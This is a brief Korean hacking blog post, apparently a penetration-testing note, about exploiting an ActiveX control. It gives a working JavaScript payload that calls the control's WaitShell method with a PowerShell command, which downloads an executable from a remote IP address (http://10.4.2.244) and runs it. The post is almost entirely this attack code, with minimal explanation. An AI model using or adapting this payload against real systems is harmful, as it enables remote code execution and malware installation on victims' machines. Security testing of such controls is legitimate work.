Active X 취약점 점검 방법 (with powershell)

Hack/No filtered 2020. 4. 6. 10:43

COMRaider / visual C++ 6.0 사용하여 메소드에서 활용 가능한 함수 확인 후 아래 코드를 이용하여 함수 실행

WaitShell 함수에 원격 코드 실행 취약점이 존재하여 powershell 명령어를 활용하여 원격지 파일 다운로드및 실행을 수행하도록 진행함

MyActiveX webpage

    <script type="text/javascript">
        try {
            var obj = document.myActiveX;
            if (obj) {
               obj.WaitShell("cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://10.4.2.244/dashboard/YlwIISClient.exe','C:\\abc.exe') & C:\\abc.exe","0");

            } else {
                alert("Object is not created!");
            }
        } catch (ex) {
            alert("Some error happens, error message is: " + ex.Description);
        }

    </script>

'Hack > No filtered' 카테고리의 다른 글

reverse shell summary (0)	2020.04.08
ios 정적 분석 방법 (0)	2020.04.06
openvas 설치 및 사용법 (0)	2020.04.06
2016 HDCON 사고분석 1-1 문제 (0)	2020.04.06
악성코드 감염 분석 TIP (0)	2020.04.06

ABOUT ME

Jaden's Note Jaden's Note

'Hack > No filtered' 카테고리의 다른 글

티스토리툴바

ABOUT ME

'Hack > No filtered' 카테고리의 다른 글

관련글 관련글 더보기

티스토리툴바